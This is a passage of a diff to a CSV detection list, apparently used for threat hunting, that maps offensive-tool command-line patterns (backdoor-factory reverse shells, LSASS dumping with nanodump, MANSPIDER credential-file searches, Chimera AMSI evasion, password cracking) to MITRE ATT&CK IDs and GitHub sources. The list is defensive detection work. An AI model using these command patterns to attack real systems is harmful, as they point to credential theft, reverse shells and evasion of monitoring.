Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -f passw -e xlsx csv *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f passw user admin account network login logon cred *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f psexec.exe -H * -P * -s reverse_shell_tcp*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f shells/generic1.ps1 *","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f TeamViewer.exe -H * -P * -s *","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* -FakeCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"* -FakeCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* -FakeCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* -FakeDC * -SamAccountName * -Username *","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --file ownedusers.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --file-smuggler-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* --file-smuggler-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "* filetransfer -download -src-file *.exe*/tmp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* filetransfer -upload -src-file *.exe*\temp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* FileZillaPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" @@ -639,22 +639,22 @@ "* -fluctuate=NA -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -fluctuate=RW -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --flush-attacks*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"* --flush-attacks*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "* follina.py *","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"* -force-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* --force-kerb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --force-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -force-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --force-kerb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --force-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* forgeTGT(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* --fork --write *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"* --format exe * --jitter *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"* --format kirbi*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --format exe * --jitter *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* --format kirbi*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* -format=bof *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=bof -cleanup *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=dotnet -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=dotnet-pinvoke *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* --format=krb5asrep* --wordlist=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --format=netntlmv2 *.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --format=NT -w=*_password.txt*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --format=krb5asrep* --wordlist=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --format=netntlmv2 *.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --format=NT -w=*_password.txt*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* -format=reflective-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=service-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 